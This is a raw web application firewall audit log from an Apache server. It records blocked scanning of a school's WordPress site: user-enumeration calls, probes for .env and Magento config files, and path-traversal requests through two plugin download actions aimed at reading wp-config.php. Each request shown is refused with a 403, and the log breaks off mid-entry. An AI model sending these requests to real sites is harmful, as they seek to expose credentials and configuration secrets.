Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --865e6122-Z-- --23dbe139-A-- [01/Jun/2025:05:24:06 +0700] aDuBhgQHT18O7PnXxsQGAAAAAIU 103.236.140.4 57540 103.236.140.4 8181 --23dbe139-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 47.80.1.132 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 47.80.1.132 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --23dbe139-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --23dbe139-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748730246187456 3505 (- - -) Stopwatch2: 1748730246187456 3505; combined=1490, p1=482, p2=977, p3=0, p4=0, p5=31, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --23dbe139-Z-- --bb12817a-A-- [01/Jun/2025:05:51:55 +0700] aDuIC-4LjVe0Eerk_ZaHlwAAAEc 103.236.140.4 57690 103.236.140.4 8181 --bb12817a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 149.86.145.134 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 149.86.145.134 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --bb12817a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bb12817a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748731915225403 3316 (- - -) Stopwatch2: 1748731915225403 3316; combined=1401, p1=472, p2=898, p3=0, p4=0, p5=31, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bb12817a-Z-- --75d01d0a-A-- [01/Jun/2025:05:55:05 +0700] aDuIyQQHT18O7PnXxsQGIwAAAJg 103.236.140.4 57716 103.236.140.4 8181 --75d01d0a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.223.236.205 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.223.236.205 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --75d01d0a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --75d01d0a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748732105744495 910 (- - -) Stopwatch2: 1748732105744495 910; combined=380, p1=339, p2=0, p3=0, p4=0, p5=41, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --75d01d0a-Z-- --0c91772a-A-- [01/Jun/2025:05:58:04 +0700] aDuJfEaTRmdfB-FaJjm5JwAAAAs 103.236.140.4 57730 103.236.140.4 8181 --0c91772a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.76.29 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.76.29 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0c91772a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0c91772a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748732284533593 3442 (- - -) Stopwatch2: 1748732284533593 3442; combined=1515, p1=523, p2=955, p3=0, p4=0, p5=37, sr=126, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0c91772a-Z-- --6a4b1b53-A-- [01/Jun/2025:05:58:07 +0700] aDuJf-4LjVe0Eerk_ZaHmgAAAE4 103.236.140.4 57734 103.236.140.4 8181 --6a4b1b53-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.76.29 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.76.29 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6a4b1b53-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6a4b1b53-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748732287045292 2401 (- - -) Stopwatch2: 1748732287045292 2401; combined=1059, p1=382, p2=645, p3=0, p4=0, p5=32, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6a4b1b53-Z-- --938f5e32-A-- [01/Jun/2025:06:50:15 +0700] aDuVtwQ4kZQGAOBHoB5CkgAAANg 103.236.140.4 59368 103.236.140.4 8181 --938f5e32-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.164.3.136 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.164.3.136 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --938f5e32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --938f5e32-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748735415494295 2796 (- - -) Stopwatch2: 1748735415494295 2796; combined=1159, p1=397, p2=738, p3=0, p4=0, p5=24, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --938f5e32-Z-- --a2132b5d-A-- [01/Jun/2025:07:01:55 +0700] aDuYcwQHT18O7PnXxsQIUwAAAIs 103.236.140.4 59412 103.236.140.4 8181 --a2132b5d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 200.215.161.48 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 200.215.161.48 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a2132b5d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a2132b5d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748736115527616 2749 (- - -) Stopwatch2: 1748736115527616 2749; combined=1285, p1=416, p2=839, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a2132b5d-Z-- --097a1a3c-A-- [01/Jun/2025:07:03:59 +0700] aDuY7wQ4kZQGAOBHoB5ClgAAAMk 103.236.140.4 59414 103.236.140.4 8181 --097a1a3c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.88.92 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.88.92 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --097a1a3c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --097a1a3c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748736239887921 3657 (- - -) Stopwatch2: 1748736239887921 3657; combined=1626, p1=568, p2=1026, p3=0, p4=0, p5=32, sr=154, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --097a1a3c-Z-- --0eb47d75-A-- [01/Jun/2025:07:04:02 +0700] aDuY8u4LjVe0Eerk_ZaH9gAAAEw 103.236.140.4 59418 103.236.140.4 8181 --0eb47d75-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.88.92 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.88.92 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0eb47d75-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0eb47d75-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748736242362692 3463 (- - -) Stopwatch2: 1748736242362692 3463; combined=1522, p1=496, p2=988, p3=0, p4=0, p5=38, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0eb47d75-Z-- --f6238e3d-A-- [01/Jun/2025:07:07:35 +0700] aDuZx-4LjVe0Eerk_ZaH-gAAAFQ 103.236.140.4 59458 103.236.140.4 8181 --f6238e3d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 8.12; MSIEMobile6.0) Accept-Charset: utf-8 --f6238e3d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f6238e3d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748736455199267 903 (- - -) Stopwatch2: 1748736455199267 903; combined=395, p1=353, p2=0, p3=0, p4=0, p5=42, sr=126, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f6238e3d-Z-- --6f2f1c44-A-- [01/Jun/2025:07:07:40 +0700] aDuZzO4LjVe0Eerk_ZaH-wAAAFI 103.236.140.4 59460 103.236.140.4 8181 --6f2f1c44-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; Pixel) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --6f2f1c44-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6f2f1c44-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748736460637985 665 (- - -) Stopwatch2: 1748736460637985 665; combined=255, p1=222, p2=0, p3=0, p4=0, p5=32, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6f2f1c44-Z-- --75a5c47c-A-- [01/Jun/2025:07:14:27 +0700] aDubY-4LjVe0Eerk_ZaH_AAAAFM 103.236.140.4 59482 103.236.140.4 8181 --75a5c47c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.133.76.20 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.133.76.20 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --75a5c47c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --75a5c47c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748736867113677 3515 (- - -) Stopwatch2: 1748736867113677 3515; combined=1547, p1=566, p2=948, p3=0, p4=0, p5=32, sr=144, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --75a5c47c-Z-- --8c61501b-A-- [01/Jun/2025:07:35:15 +0700] aDugQ-4LjVe0Eerk_ZaIAgAAAEY 103.236.140.4 59564 103.236.140.4 8181 --8c61501b-B-- GET /app/etc/local.xml HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.240 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.240 X-Forwarded-Proto: http Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --8c61501b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8c61501b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/app/etc/local.xml" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748738115781890 898 (- - -) Stopwatch2: 1748738115781890 898; combined=369, p1=328, p2=0, p3=0, p4=0, p5=41, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8c61501b-Z-- --d5ba6a2f-A-- [01/Jun/2025:07:35:16 +0700] aDugREaTRmdfB-FaJjm5gQAAAA8 103.236.140.4 59566 103.236.140.4 8181 --d5ba6a2f-B-- GET /wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.240 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.240 X-Forwarded-Proto: http Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --d5ba6a2f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d5ba6a2f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748738116139579 678 (- - -) Stopwatch2: 1748738116139579 678; combined=268, p1=235, p2=0, p3=0, p4=0, p5=33, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d5ba6a2f-Z-- --3deaab52-A-- [01/Jun/2025:07:35:16 +0700] aDugRAQ4kZQGAOBHoB5CpAAAAMk 103.236.140.4 59568 103.236.140.4 8181 --3deaab52-B-- GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.240 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.240 X-Forwarded-Proto: http Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --3deaab52-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3deaab52-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748738116497037 28726 (- - -) Stopwatch2: 1748738116497037 28726; combined=56249, p1=251, p2=0, p3=0, p4=0, p5=28016, sr=66, sw=1, l=0, gc=27981 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3deaab52-Z-- --df2ca260-A-- [01/Jun/2025:07:35:17 +0700] aDugRQQ4kZQGAOBHoB5CpwAAAMw 103.236.140.4 59574 103.236.140.4 8181 --df2ca260-B-- GET /blog/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.240 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.240 X-Forwarded-Proto: http Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --df2ca260-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --df2ca260-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748738117594201 759 (- - -) Stopwatch2: 1748738117594201 759; combined=313, p1=277, p2=0, p3=0, p4=0, p5=36, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --df2ca260-Z-- --a422ec1d-A-- [01/Jun/2025:07:35:17 +0700] aDugRUaTRmdfB-FaJjm5ggAAABE 103.236.140.4 59576 103.236.140.4 8181 --a422ec1d-B-- GET /admin/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.240 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.240 X-Forwarded-Proto: http Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --a422ec1d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a422ec1d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748738117955571 717 (- - -) Stopwatch2: 1748738117955571 717; combined=310, p1=276, p2=0, p3=0, p4=0, p5=34, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a422ec1d-Z-- --90f0e81a-A-- [01/Jun/2025:07:35:18 +0700] aDugRkaTRmdfB-FaJjm5gwAAABA 103.236.140.4 59578 103.236.140.4 8181 --90f0e81a-B-- GET /laravel/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.240 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.240 X-Forwarded-Proto: http Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --90f0e81a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --90f0e81a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at 